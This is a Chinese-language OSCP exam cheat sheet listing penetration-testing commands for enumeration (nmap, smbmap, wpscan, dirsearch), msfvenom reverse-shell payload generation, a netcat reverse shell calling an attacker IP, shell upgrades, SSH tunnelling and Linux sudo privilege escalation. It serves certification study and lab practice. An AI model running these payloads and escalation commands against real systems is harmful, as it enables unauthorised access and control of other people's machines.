# OSCP 總整理指令集 ###### tags: `OSCP` ## 1. Enumeration [nmap](https://hack543.com/nmap-tutorial/) [rustscan](https://hack543.com/rustscan-intro/) : `rustscan -a 192.168.0.1 --scripts none --ulimit 5000` [dirsearch]: `dirsearch -u http://10.10.10.9/ -e php -x 403,404 -t 50` gobuster > /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt > /usr/share/wordlists/rockyou.txt ### SMB * smbmap -H 192.168.1.40 # enumerate share folder * smbmap -H 192.168.1.17 -u raj -p 123 * smbclient -L 192.168.1.40 * nmap --script smb-enum-shares -p139,445 192.168.1.17 * nmap --script smb-vuln* 192.168.1.16 * nmap -Pn -sV -sC -oA 192.168.1.16 * [參考連結](https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/) ### FTP ### Web * nikto --host=http://mywebsit.com -maxtime=30s * wpscan --url sandbox.local --enumerate ap,at,cb,dbe ->[參考連結](https://www.itread01.com/hkyxlhk.html) * wpscan -e ap --plugins-detection aggressive --url http://backdoor.htb --api-token $WPSCAN_API * feroxbuster -u http://backdoor.htb/wp-content/plugins -w plugins.txt (plugin scan through [wordlist](https://raw.githubusercontent.com/Perfectdotexe/WordPress-Plugins-List/master/plugins.txt)) (/wp-content/plugins/) * dirb / feroxbuster * sudo apt install seclists ### Other tools * enum4linux * [oscp-note](https://github.com/AidenPearce369/OSCP-Notes) * [PayloadAllTheTime](https://github.com/swisskyrepo/PayloadsAllTheThings) * [Hacktricks](https://book.hacktricks.xyz/welcome/readme) * [updog](https://github.com/sc0tfree/updog) * [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) * [droopescan](https://github.com/SamJoan/droopescan) ## 2. Make payload (msfvenom) * [Reverse shell generater](https://www.revshells.com/) * msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.15 lport=4444 -f exe > shell_reverse_tcp * msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機IP LPORT=攻擊機port -f exe -o /tmp/exploit.exe [msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -o exploit.exe] * /bin/bash -c ‘nc 192.168.234.166 1337 -e /bin/sh’ ### php後門 https://github.com/Arrexel/phpbash ### 彈出互動式bash `python -c 'import pty; pty.spawn("/bin/bash")'` ### Port Redirection * https://infinitelogins.com/2020/12/11/tunneling-through-windows-machines-with-chisel/ ### File Transfer、檔案下載 * https://infinitelogins.com/2020/09/04/windows-file-transfer-cheatsheet/ * [certutil](https://cloud.tencent.com/developer/article/1850744) ### SSH tunnel Dynamic port forwording: 內網 ssh server 啟動 socks proxy，對外有 bind_address:port，若 client 對此連線，則會導引到內網 proxy，並執行對應的連線請求。 [參考連結](https://johnliu55.tw/ssh-tunnel.html) 1.連到某台伺服器，並將 bind_address:port 導到 host:port。 `ssh -L [bind_address:]<port>:<host>:<host_port> <SSH Server> ` `ssh -R [bind_address:]<port>:<host>:<host_port> <SSH Server> ` `ssh -D [bind_address:]<port> <SSH Server>` <br/> ## 3. Privilege Escalation ### Linux 1. `sudo -l` -> `sudo perl -e 'exec "/bin/bash"'` 2. `sudo -l` -> `sudo -u user /bin/bash` 3. docker 4. list sudoers: `grep '^sudo:.*$' /etc/group | cut -d: -f4` 5. [LinEnum](https://github.com/rebootuser/LinEnum) ### Windows 1. [Windows-Exploit-Suggester: 先裝pip install xlrd==1.2.0](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) 2. [JuicyPatato](https://github.com/ohpe/juicy-potato/releases) 3. [PEASS-ng:感覺好用](https://github.com/carlospolop/PEASS-ng/releases/tag/20221102) ## ALL * [hack tricks](https://book.hacktricks.xyz/welcome/readme)